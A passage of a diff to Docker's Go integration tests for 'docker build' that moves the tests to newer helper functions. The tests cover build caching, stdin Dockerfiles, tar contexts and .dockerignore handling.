-	id2, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name)
+	buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx))
+	id3 := getIDByName(c, name)
 	if id1 != id2 {
 		c.Fatal("The cache should have been used but hasn't.")
 	}
+	if id1 == id3 {
+		c.Fatal("The cache should have been invalidated but hasn't.")
+	}
 }
 
 func testContextTar(c *check.C, compression archive.Compression) {
-	ctx, err := fakeContext(
-		`FROM busybox
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(`FROM busybox
 ADD foo /foo
-CMD ["cat", "/foo"]`,
-		map[string]string{
+CMD ["cat", "/foo"]`),
+		fakecontext.WithFiles(map[string]string{
 			"foo": "bar",
-		},
+		}),
 	)
-	if err != nil {
-		c.Fatal(err)
-	}
 	defer ctx.Close()
 	context, err := archive.Tar(ctx.Dir, compression)
 	if err != nil {
 		c.Fatalf("failed to build context tar: %v", err)
 	}
 	name := "contexttar"
-	buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-")
-	buildCmd.Stdin = context
 
-	if out, _, err := runCommandWithOutput(buildCmd); err != nil {
-		c.Fatalf("build failed to complete: %v %v", out, err)
-	}
+	cli.BuildCmd(c, name, build.WithStdinContext(context))
 }
 
 func (s *DockerSuite) TestBuildContextTarGzip(c *check.C) {
@@ -2868,53 +2054,99 @@ func (s *DockerSuite) TestBuildContextTarNoCompression(c *check.C) {
 }
 
 func (s *DockerSuite) TestBuildNoContext(c *check.C) {
-	buildCmd := exec.Command(dockerBinary, "build", "-t", "nocontext", "-")
-	buildCmd.Stdin = strings.NewReader(
-		`FROM busybox
-		CMD ["echo", "ok"]`)
-
-	if out, _, err := runCommandWithOutput(buildCmd); err != nil {
-		c.Fatalf("build failed to complete: %v %v", out, err)
-	}
+	name := "nocontext"
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "build", "-t", name, "-"},
+		Stdin: strings.NewReader(
+			`FROM busybox
+			CMD ["echo", "ok"]`),
+	}).Assert(c, icmd.Success)
 
 	if out, _ := dockerCmd(c, "run", "--rm", "nocontext"); out != "ok\n" {
 		c.Fatalf("run produced invalid output: %q, expected %q", out, "ok")
 	}
 }
 
-// TODO: TestCaching
-func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithoutCache(c *check.C) {
-	name := "testbuildaddlocalandremotefilewithoutcache"
-	name2 := "testbuildaddlocalandremotefilewithoutcache2"
-	server, err := fakeStorage(map[string]string{
-		"baz": "hello",
+// FIXME(vdemeester) migrate to docker/cli e2e
+func (s *DockerSuite) TestBuildDockerfileStdin(c *check.C) {
+	name := "stdindockerfile"
+	tmpDir, err := ioutil.TempDir("", "fake-context")
+	c.Assert(err, check.IsNil)
+	err = ioutil.WriteFile(filepath.Join(tmpDir, "foo"), []byte("bar"), 0600)
+	c.Assert(err, check.IsNil)
+
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "build", "-t", name, "-f", "-", tmpDir},
+		Stdin: strings.NewReader(
+			`FROM busybox
+ADD foo /foo
+CMD ["cat", "/foo"]`),
+	}).Assert(c, icmd.Success)
+
+	res := inspectField(c, name, "Config.Cmd")
+	c.Assert(strings.TrimSpace(string(res)), checker.Equals, `[cat /foo]`)
+}
+
+// FIXME(vdemeester) migrate to docker/cli tests (unit or e2e)
+func (s *DockerSuite) TestBuildDockerfileStdinConflict(c *check.C) {
+	name := "stdindockerfiletarcontext"
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "build", "-t", name, "-f", "-", "-"},
+	}).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "use stdin for both build context and dockerfile",
 	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer server.Close()
+}
 
-	ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+`
-        MAINTAINER dockerio
-        ADD foo /usr/lib/bla/bar
-        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
-		map[string]string{
-			"foo": "hello world",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
+func (s *DockerSuite) TestBuildDockerfileStdinNoExtraFiles(c *check.C) {
+	s.testBuildDockerfileStdinNoExtraFiles(c, false, false)
+}
+
+func (s *DockerSuite) TestBuildDockerfileStdinDockerignore(c *check.C) {
+	s.testBuildDockerfileStdinNoExtraFiles(c, true, false)
+}
+
+func (s *DockerSuite) TestBuildDockerfileStdinDockerignoreIgnored(c *check.C) {
+	s.testBuildDockerfileStdinNoExtraFiles(c, true, true)
+}
+
+func (s *DockerSuite) testBuildDockerfileStdinNoExtraFiles(c *check.C, hasDockerignore, ignoreDockerignore bool) {
+	name := "stdindockerfilenoextra"
+	tmpDir, err := ioutil.TempDir("", "fake-context")
+	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(tmpDir)
+
+	writeFile := func(filename, content string) {
+		err = ioutil.WriteFile(filepath.Join(tmpDir, filename), []byte(content), 0600)
+		c.Assert(err, check.IsNil)
 	}
-	id2, err := buildImageFromContext(name2, ctx, false)
-	if err != nil {
-		c.Fatal(err)
+
+	writeFile("foo", "bar")
+
+	if hasDockerignore {
+		// Add an empty Dockerfile to verify that it is not added to the image
+		writeFile("Dockerfile", "")
+
+		ignores := "Dockerfile\n"
+		if ignoreDockerignore {
+			ignores += ".dockerignore\n"
+		}
+		writeFile(".dockerignore", ignores)
 	}
-	if id1 == id2 {
-		c.Fatal("The cache should have been invalidated but hasn't.")
+
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "build", "-t", name, "-f", "-", tmpDir},
+		Stdin: strings.NewReader(
+			`FROM busybox
+COPY . /baz`),
+	})
+	result.Assert(c, icmd.Success)
+
+	result = cli.DockerCmd(c, "run", "--rm", name, "ls", "-A", "/baz")
+	if hasDockerignore && !ignoreDockerignore {
+		c.Assert(result.Stdout(), checker.Equals, ".dockerignore\nfoo\n")
+	} else {
+		c.Assert(result.Stdout(), checker.Equals, "foo\n")
 	}
 }
 
@@ -2922,22 +2154,14 @@ func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildimg"
 
-	_, err := buildImage(name,
-		`FROM busybox:latest
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox:latest
         RUN mkdir /test && chown daemon:daemon /test && chmod 0600 /test
-        VOLUME /test`,
-		true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
+        VOLUME /test`))
 
 	out, _ := dockerCmd(c, "run", "--rm", "testbuildimg", "ls", "-la", "/test")
-
 	if expected := "drw-------"; !strings.Contains(out, expected) {
 		c.Fatalf("expected %s received %s", expected, out)
 	}
-
 	if expected := "daemon   daemon"; !strings.Contains(out, expected) {
 		c.Fatalf("expected %s received %s", expected, out)
 	}
@@ -2948,27 +2172,16 @@ func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) {
 // utilizing cache
 func (s *DockerSuite) TestBuildEntrypointRunCleanup(c *check.C) {
 	name := "testbuildcmdcleanup"
-	if _, err := buildImage(name,
-		`FROM busybox
-        RUN echo "hello"`,
-		true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+        RUN echo "hello"`))
 
-	ctx, err := fakeContext(`FROM busybox
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
         RUN echo "hello"
         ADD foo /foo
-        ENTRYPOINT ["/bin/echo"]`,
-		map[string]string{
-			"foo": "hello",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+        ENTRYPOINT ["/bin/echo"]`),
+		build.WithFile("foo", "hello")))
+
 	res := inspectField(c, name, "Config.Cmd")
 	// Cmd must be cleaned up
 	if res != "[]" {
@@ -2980,46 +2193,29 @@ func (s *DockerSuite) TestBuildAddFileNotFound(c *check.C) {
 	name := "testbuildaddnotfound"
 	expected := "foo: no such file or directory"
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = "foo: The system cannot find the file specified"
 	}
 
-	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
-        ADD foo /usr/local/bar`,
-		map[string]string{"bar": "hello"})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		if !strings.Contains(err.Error(), expected) {
-			c.Fatalf("Wrong error %v, must be about missing foo file or directory", err)
-		}
-	} else {
-		c.Fatal("Error must not be nil")
-	}
+	buildImage(name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+`
+        ADD foo /usr/local/bar`),
+		build.WithFile("bar", "hello"))).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      expected,
+	})
 }
 
 func (s *DockerSuite) TestBuildInheritance(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildinheritance"
 
-	_, err := buildImage(name,
-		`FROM scratch
-		EXPOSE 2375`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch
+		EXPOSE 2375`))
 	ports1 := inspectField(c, name, "Config.ExposedPorts")
 
-	_, err = buildImage(name,
-		fmt.Sprintf(`FROM %s
-		ENTRYPOINT ["/bin/echo"]`, name),
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s
+		ENTRYPOINT ["/bin/echo"]`, name)))
 
 	res := inspectField(c, name, "Config.Entrypoint")
 	if expected := "[/bin/echo]"; res != expected {
@@ -3033,78 +2229,52 @@ func (s *DockerSuite) TestBuildInheritance(c *check.C) {
 
 func (s *DockerSuite) TestBuildFails(c *check.C) {
 	name := "testbuildfails"
-	_, err := buildImage(name,
-		`FROM busybox
-		RUN sh -c "exit 23"`,
-		true)
-	if err != nil {
-		if !strings.Contains(err.Error(), "returned a non-zero code: 23") {
-			c.Fatalf("Wrong error %v, must be about non-zero code 23", err)
-		}
-	} else {
-		c.Fatal("Error must not be nil")
-	}
+	buildImage(name, build.WithDockerfile(`FROM busybox
+		RUN sh -c "exit 23"`)).Assert(c, icmd.Expected{
+		ExitCode: 23,
+		Err:      "returned a non-zero code: 23",
+	})
 }
 
 func (s *DockerSuite) TestBuildOnBuild(c *check.C) {
 	name := "testbuildonbuild"
-	_, err := buildImage(name,
-		`FROM busybox
-		ONBUILD RUN touch foobar`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	_, err = buildImage(name,
-		fmt.Sprintf(`FROM %s
-		RUN [ -f foobar ]`, name),
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+		ONBUILD RUN touch foobar`))
+	buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s
+		RUN [ -f foobar ]`, name)))
 }
 
 // gh #2446
 func (s *DockerSuite) TestBuildAddToSymlinkDest(c *check.C) {
 	makeLink := `ln -s /foo /bar`
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		makeLink = `mklink /D C:\bar C:\foo`
 	}
 	name := "testbuildaddtosymlinkdest"
-	ctx, err := fakeContext(`FROM busybox
-        RUN sh -c "mkdir /foo"
-        RUN `+makeLink+`
-        ADD foo /bar/
-        RUN sh -c "[ -f /bar/foo ]"
-        RUN sh -c "[ -f /foo/foo ]"`,
-		map[string]string{
-			"foo": "hello",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
+		FROM busybox
+		RUN sh -c "mkdir /foo"
+		RUN `+makeLink+`
+		ADD foo /bar/
+		RUN sh -c "[ -f /bar/foo ]"
+		RUN sh -c "[ -f /foo/foo ]"`),
+		build.WithFile("foo", "hello"),
+	))
 }
 
 func (s *DockerSuite) TestBuildEscapeWhitespace(c *check.C) {
 	name := "testbuildescapewhitespace"
 
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   # ESCAPE=\
   FROM busybox
   MAINTAINER "Docker \
 IO <io@\
 docker.com>"
-  `, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+  `))
 
 	res := inspectField(c, name, "Author")
-
 	if res != "\"Docker IO <io@docker.com>\"" {
 		c.Fatalf("Parsed string did not match the escaped string. Got: %q", res)
 	}
@@ -3115,17 +2285,11 @@ func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) {
 	// Verify that strings that look like ints are still passed as strings
 	name := "testbuildstringing"
 
-	_, err := buildImage(name, `
-  FROM busybox
-  MAINTAINER 123
-  `, true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
+	FROM busybox
+	MAINTAINER 123`))
 
 	out, _ := dockerCmd(c, "inspect", name)
-
 	if !strings.Contains(out, "\"123\"") {
 		c.Fatalf("Output does not contain the int as a string:\n%s", out)
 	}
@@ -3134,9 +2298,10 @@ func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) {
 
 func (s *DockerSuite) TestBuildDockerignore(c *check.C) {
 	name := "testbuilddockerignore"
-	dockerfile := `
-        FROM busybox
-        ADD . /bla
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
+		FROM busybox
+		 ADD . /bla
 		RUN sh -c "[[ -f /bla/src/x.go ]]"
 		RUN sh -c "[[ -f /bla/Makefile ]]"
 		RUN sh -c "[[ ! -e /bla/src/_vendor ]]"
@@ -3147,62 +2312,48 @@ func (s *DockerSuite) TestBuildDockerignore(c *check.C) {
 		RUN sh -c "[[ ! -e /bla/.git ]]"
 		RUN sh -c "[[ ! -e v.cc ]]"
 		RUN sh -c "[[ ! -e src/v.cc ]]"
-		RUN sh -c "[[ ! -e src/_vendor/v.cc ]]"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Makefile":         "all:",
-		".git/HEAD":        "ref: foo",
-		"src/x.go":         "package main",
-		"src/_vendor/v.go": "package main",
-		"src/_vendor/v.cc": "package main",
-		"src/v.cc":         "package main",
-		"v.cc":             "package main",
-		"dir/foo":          "",
-		".gitignore":       "",
-		"README.md":        "readme",
-		".dockerignore": `
+		RUN sh -c "[[ ! -e src/_vendor/v.cc ]]"`),
+		build.WithFile("Makefile", "all:"),
+		build.WithFile(".git/HEAD", "ref: foo"),
+		build.WithFile("src/x.go", "package main"),
+		build.WithFile("src/_vendor/v.go", "package main"),
+		build.WithFile("src/_vendor/v.cc", "package main"),
+		build.WithFile("src/v.cc", "package main"),
+		build.WithFile("v.cc", "package main"),
+		build.WithFile("dir/foo", ""),
+		build.WithFile(".gitignore", ""),
+		build.WithFile("README.md", "readme"),
+		build.WithFile(".dockerignore", `
 .git
 pkg
 .gitignore
 src/_vendor
 *.md
 **/*.cc
-dir`,
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+dir`),
+	))
 }
 
 func (s *DockerSuite) TestBuildDockerignoreCleanPaths(c *check.C) {
 	name := "testbuilddockerignorecleanpaths"
-	dockerfile := `
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
         FROM busybox
         ADD . /tmp/
-        RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"foo":           "foo",
-		"foo2":          "foo2",
-		"dir1/foo":      "foo in dir1",
-		".dockerignore": "./foo\ndir1//foo\n./dir1/../foo2",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+        RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"`),
+		build.WithFile("foo", "foo"),
+		build.WithFile("foo2", "foo2"),
+		build.WithFile("dir1/foo", "foo in dir1"),
+		build.WithFile(".dockerignore", "./foo\ndir1//foo\n./dir1/../foo2"),
+	))
 }
 
 func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) {
 	name := "testbuilddockerignoreexceptions"
-	dockerfile := `
-        FROM busybox
-        ADD . /bla
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
+		FROM busybox
+		ADD . /bla
 		RUN sh -c "[[ -f /bla/src/x.go ]]"
 		RUN sh -c "[[ -f /bla/Makefile ]]"
 		RUN sh -c "[[ ! -e /bla/src/_vendor ]]"
@@ -3214,22 +2365,21 @@ func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) {
 		RUN sh -c "[[ -f /bla/dir/e-dir/foo ]]"
 		RUN sh -c "[[ ! -e /bla/foo ]]"
 		RUN sh -c "[[ ! -e /bla/.git ]]"
-		RUN sh -c "[[ -e /bla/dir/a.cc ]]"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Makefile":         "all:",
-		".git/HEAD":        "ref: foo",
-		"src/x.go":         "package main",
-		"src/_vendor/v.go": "package main",
-		"dir/foo":          "",
-		"dir/foo1":         "",
-		"dir/dir/f1":       "",
-		"dir/dir/foo":      "",
-		"dir/e":            "",
-		"dir/e-dir/foo":    "",
-		".gitignore":       "",
-		"README.md":        "readme",
-		"dir/a.cc":         "hello",
-		".dockerignore": `
+		RUN sh -c "[[ -e /bla/dir/a.cc ]]"`),
+		build.WithFile("Makefile", "all:"),
+		build.WithFile(".git/HEAD", "ref: foo"),
+		build.WithFile("src/x.go", "package main"),
+		build.WithFile("src/_vendor/v.go", "package main"),
+		build.WithFile("dir/foo", ""),
+		build.WithFile("dir/foo1", ""),
+		build.WithFile("dir/dir/f1", ""),
+		build.WithFile("dir/dir/foo", ""),
+		build.WithFile("dir/e", ""),
+		build.WithFile("dir/e-dir/foo", ""),
+		build.WithFile(".gitignore", ""),
+		build.WithFile("README.md", "readme"),
+		build.WithFile("dir/a.cc", "hello"),
+		build.WithFile(".dockerignore", `
 .git
 pkg
 .gitignore
@@ -3239,228 +2389,174 @@ dir
 !dir/e*
 !dir/dir/foo
 **/*.cc
-!**/*.cc`,
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+!**/*.cc`),
+	))
 }
 
 func (s *DockerSuite) TestBuildDockerignoringDockerfile(c *check.C) {
 	name := "testbuilddockerignoredockerfile"
 	dockerfile := `
-        FROM busybox
+		FROM busybox
 		ADD . /tmp/
 		RUN sh -c "! ls /tmp/Dockerfile"
 		RUN ls /tmp/.dockerignore`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile":    dockerfile,
-		".dockerignore": "Dockerfile\n",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't ignore Dockerfile correctly:%s", err)
-	}
-
-	// now try it with ./Dockerfile
-	ctx.Add(".dockerignore", "./Dockerfile\n")
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't ignore ./Dockerfile correctly:%s", err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile(".dockerignore", "Dockerfile\n"),
+	))
+	// FIXME(vdemeester) why twice ?
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile(".dockerignore", "./Dockerfile\n"),
+	))
 }
 
 func (s *DockerSuite) TestBuildDockerignoringRenamedDockerfile(c *check.C) {
 	name := "testbuilddockerignoredockerfile"
 	dockerfile := `
-        FROM busybox
+		FROM busybox
 		ADD . /tmp/
 		RUN ls /tmp/Dockerfile
 		RUN sh -c "! ls /tmp/MyDockerfile"
 		RUN ls /tmp/.dockerignore`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile":    "Should not use me",
-		"MyDockerfile":  dockerfile,
-		".dockerignore": "MyDockerfile\n",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't ignore MyDockerfile correctly:%s", err)
-	}
-
-	// now try it with ./MyDockerfile
-	ctx.Add(".dockerignore", "./MyDockerfile\n")
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't ignore ./MyDockerfile correctly:%s", err)
-	}
-
+	buildImageSuccessfully(c, name, cli.WithFlags("-f", "MyDockerfile"), build.WithBuildContext(c,
+		build.WithFile("Dockerfile", "Should not use me"),
+		build.WithFile("MyDockerfile", dockerfile),
+		build.WithFile(".dockerignore", "MyDockerfile\n"),
+	))
+	// FIXME(vdemeester) why twice ?
+	buildImageSuccessfully(c, name, cli.WithFlags("-f", "MyDockerfile"), build.WithBuildContext(c,
+		build.WithFile("Dockerfile", "Should not use me"),
+		build.WithFile("MyDockerfile", dockerfile),
+		build.WithFile(".dockerignore", "./MyDockerfile\n"),
+	))
 }
 
 func (s *DockerSuite) TestBuildDockerignoringDockerignore(c *check.C) {
 	name := "testbuilddockerignoredockerignore"
 	dockerfile := `
-        FROM busybox
+		FROM busybox
 		ADD . /tmp/
 		RUN sh -c "! ls /tmp/.dockerignore"
 		RUN ls /tmp/Dockerfile`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile":    dockerfile,
-		".dockerignore": ".dockerignore\n",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't ignore .dockerignore correctly:%s", err)
-	}
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile(".dockerignore", ".dockerignore\n"),
+	))
 }
 
 func (s *DockerSuite) TestBuildDockerignoreTouchDockerfile(c *check.C) {
-	var id1 string
-	var id2 string
-
 	name := "testbuilddockerignoretouchdockerfile"
 	dockerfile := `
         FROM busybox
 		ADD . /tmp/`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile":    dockerfile,
-		".dockerignore": "Dockerfile\n",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			".dockerignore": "Dockerfile\n",
+		}))
 	defer ctx.Close()
 
-	if id1, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't build it correctly:%s", err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
 
-	if id2, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't build it correctly:%s", err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name)
 	if id1 != id2 {
 		c.Fatalf("Didn't use the cache - 1")
 	}
 
 	// Now make sure touching Dockerfile doesn't invalidate the cache
-	if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil {
+	if err := ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil {
 		c.Fatalf("Didn't add Dockerfile: %s", err)
 	}
-	if id2, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't build it correctly:%s", err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id2 = getIDByName(c, name)
 	if id1 != id2 {
 		c.Fatalf("Didn't use the cache - 2")
 	}
 
 	// One more time but just 'touch' it instead of changing the content
-	if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil {
+	if err := ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil {
 		c.Fatalf("Didn't add Dockerfile: %s", err)
 	}
-	if id2, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("Didn't build it correctly:%s", err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id2 = getIDByName(c, name)
 	if id1 != id2 {
 		c.Fatalf("Didn't use the cache - 3")
 	}
-
 }
 
 func (s *DockerSuite) TestBuildDockerignoringWholeDir(c *check.C) {
 	name := "testbuilddockerignorewholedir"
+
 	dockerfile := `
-        FROM busybox
+		FROM busybox
 		COPY . /
 		RUN sh -c "[[ ! -e /.gitignore ]]"
-		RUN sh -c "[[ -f /Makefile ]]"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile":    "FROM scratch",
-		"Makefile":      "all:",
-		".gitignore":    "",
-		".dockerignore": ".*\n",
-	})
-	c.Assert(err, check.IsNil)
-	defer ctx.Close()
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+		RUN sh -c "[[ ! -e /Makefile ]]"`
 
-	c.Assert(ctx.Add(".dockerfile", "*"), check.IsNil)
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile(".dockerignore", "*\n"),
+		build.WithFile("Makefile", "all:"),
+		build.WithFile(".gitignore", ""),
+	))
+}
 
-	c.Assert(ctx.Add(".dockerfile", "."), check.IsNil)
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+func (s *DockerSuite) TestBuildDockerignoringOnlyDotfiles(c *check.C) {
+	name := "testbuilddockerignorewholedir"
 
-	c.Assert(ctx.Add(".dockerfile", "?"), check.IsNil)
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+	dockerfile := `
+		FROM busybox
+		COPY . /
+		RUN sh -c "[[ ! -e /.gitignore ]]"
+		RUN sh -c "[[ -f /Makefile ]]"`
+
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile(".dockerignore", ".*"),
+		build.WithFile("Makefile", "all:"),
+		build.WithFile(".gitignore", ""),
+	))
 }
 
 func (s *DockerSuite) TestBuildDockerignoringBadExclusion(c *check.C) {
 	name := "testbuilddockerignorebadexclusion"
-	dockerfile := `
-        FROM busybox
+	buildImage(name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
+		FROM busybox
 		COPY . /
 		RUN sh -c "[[ ! -e /.gitignore ]]"
-		RUN sh -c "[[ -f /Makefile ]]"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile":    "FROM scratch",
-		"Makefile":      "all:",
-		".gitignore":    "",
-		".dockerignore": "!\n",
+		RUN sh -c "[[ -f /Makefile ]]"`),
+		build.WithFile("Makefile", "all:"),
+		build.WithFile(".gitignore", ""),
+		build.WithFile(".dockerignore", "!\n"),
+	)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      `illegal exclusion pattern: "!"`,
 	})
-	c.Assert(err, check.IsNil)
-	defer ctx.Close()
-	if _, err = buildImageFromContext(name, ctx, true); err == nil {
-		c.Fatalf("Build was supposed to fail but didn't")
-	}
-
-	if err.Error() != "failed to build the image: Error checking context: 'Illegal exclusion pattern: !'.\n" {
-		c.Fatalf("Incorrect output, got:%q", err.Error())
-	}
 }
 
 func (s *DockerSuite) TestBuildDockerignoringWildTopDir(c *check.C) {
 	dockerfile := `
-        FROM busybox
+		FROM busybox
 		COPY . /
 		RUN sh -c "[[ ! -e /.dockerignore ]]"
 		RUN sh -c "[[ ! -e /Dockerfile ]]"
 		RUN sh -c "[[ ! -e /file1 ]]"
 		RUN sh -c "[[ ! -e /dir ]]"`
 
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile": "FROM scratch",
-		"file1":      "",
-		"dir/dfile1": "",
-	})
-	c.Assert(err, check.IsNil)
-	defer ctx.Close()
-
 	// All of these should result in ignoring all files
 	for _, variant := range []string{"**", "**/", "**/**", "*"} {
-		ctx.Add(".dockerignore", variant)
-		_, err = buildImageFromContext("noname", ctx, true)
-		c.Assert(err, check.IsNil, check.Commentf("variant: %s", variant))
+		buildImageSuccessfully(c, "noname", build.WithBuildContext(c,
+			build.WithFile("Dockerfile", dockerfile),
+			build.WithFile("file1", ""),
+			build.WithFile("dir/file1", ""),
+			build.WithFile(".dockerignore", variant),
+		))
+
+		dockerCmd(c, "rmi", "noname")
 	}
 }
 
@@ -3491,31 +2587,7 @@ func (s *DockerSuite) TestBuildDockerignoringWildDirs(c *check.C) {
 
 		RUN echo all done!`
 
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile":      "FROM scratch",
-		"file0":           "",
-		"dir1/file0":      "",
-		"dir1/dir2/file0": "",
-
-		"file1":           "",
-		"dir1/file1":      "",
-		"dir1/dir2/file1": "",
-
-		"dir1/file2":      "",
